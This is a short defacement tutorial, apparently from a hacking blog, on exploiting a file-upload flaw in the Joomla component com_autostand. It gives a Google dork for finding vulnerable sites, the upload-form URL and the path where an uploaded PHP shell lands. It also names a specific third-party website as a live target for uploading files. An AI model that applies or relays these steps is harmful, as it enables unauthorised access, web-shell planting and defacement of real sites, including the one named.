Deface Dengan Teknik Com_autustand di Joomla!

---English Tutorial----

Greetings All Defacer

Today wed like to share you how to input images into website.

########################################
Exploit Title:  joomla com_autostand file upload
########################################


Vendor or Software Link: forum.joomla.org


Google dork: "inurl:com_autostand"


  • Pick one of available target
  • localhost/path/index.php?option=com_autostand&func=newItem

If you found a shell can be upload with .php then you can directly upload them to the target.
like this :
localhost/path/images/autostand/images/yourshell.php

But in this case we found this site for an example :
http://www.ww.bakaara.com/

Then we can add the exploit : //index.php?option=com_autostand&func=newItem

and add after the main url it will be like this : http://www.ww.bakaara.com//index.php?option=com_autostand&func=newItem

Then you might upload the file you want to the target site.

Demo :
http://www.ww.bakaara.com/index.php?option=com_autostand&func=print&id=164&pop=1&tmpl=component

Live Target.
http://www.ww.bakaara.com/index.php?option=com_autostand&func=newItem

Dont Just Make Google Search engine !!


That's it. Good luck
Share: